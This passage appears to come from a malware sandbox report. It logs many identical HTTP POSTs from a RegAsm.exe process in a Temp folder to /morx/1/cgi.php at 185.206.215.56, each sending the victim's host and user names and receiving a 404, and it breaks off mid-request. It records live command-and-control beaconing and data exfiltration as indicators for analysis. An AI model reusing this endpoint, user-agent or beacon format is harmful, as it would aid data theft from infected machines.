                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:22.777329922 CET1190OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:22.877247095 CET1191INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:21 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        38192.168.2.2249205185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.094146967 CET1192OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:23.169159889 CET1192OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:23.267446041 CET1192INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:22 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        39192.168.2.2249206185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.470458031 CET1193OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:23.543008089 CET1193OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:23.640826941 CET1194INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:22 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        4192.168.2.2249171185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.887025118 CET1147OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:08.965001106 CET1147OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:09.065680027 CET1147INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        40192.168.2.2249207185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:23.862730026 CET1194OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:23.933662891 CET1194OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:24.026554108 CET1195INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        41192.168.2.2249208185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:24.246260881 CET1196OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:24.324203968 CET1196OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:24.440570116 CET1196INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        42192.168.2.2249209185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:24.648293972 CET1197OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:24.715022087 CET1197OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:24.816570997 CET1197INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:23 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        43192.168.2.2249210185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.024326086 CET1198OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.105597019 CET1198OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:25.203072071 CET1199INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:24 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        44192.168.2.2249211185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.428992033 CET1199OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.496113062 CET1200OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:25.591475010 CET1200INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:24 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        45192.168.2.2249212185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:25.813759089 CET1201OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:25.887118101 CET1201OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:25.992160082 CET1201INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        46192.168.2.2249213185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.197896004 CET1202OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:26.277198076 CET1202OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:26.381041050 CET1203INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        47192.168.2.2249214185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.599441051 CET1203OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:26.668005943 CET1204OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:26.766199112 CET1204INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:25 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        48192.168.2.2249215185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:26.971787930 CET1205OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.043010950 CET1205OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:27.131364107 CET1205INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:26 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        49192.168.2.2249216185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:27.359759092 CET1206OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.433837891 CET1206OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:27.547158957 CET1207INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:26 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        5192.168.2.2249172185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:09.279376030 CET1148OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:09.356514931 CET1148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:09.462393999 CET1149INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:08 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        50192.168.2.2249217185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:27.753619909 CET1207OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:27.824155092 CET1208OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:27.916227102 CET1208INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        51192.168.2.2249218185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.127708912 CET1209OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:28.199399948 CET1209OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:28.287151098 CET1209INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:27 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        52192.168.2.2249219185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:28.505440950 CET1210OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
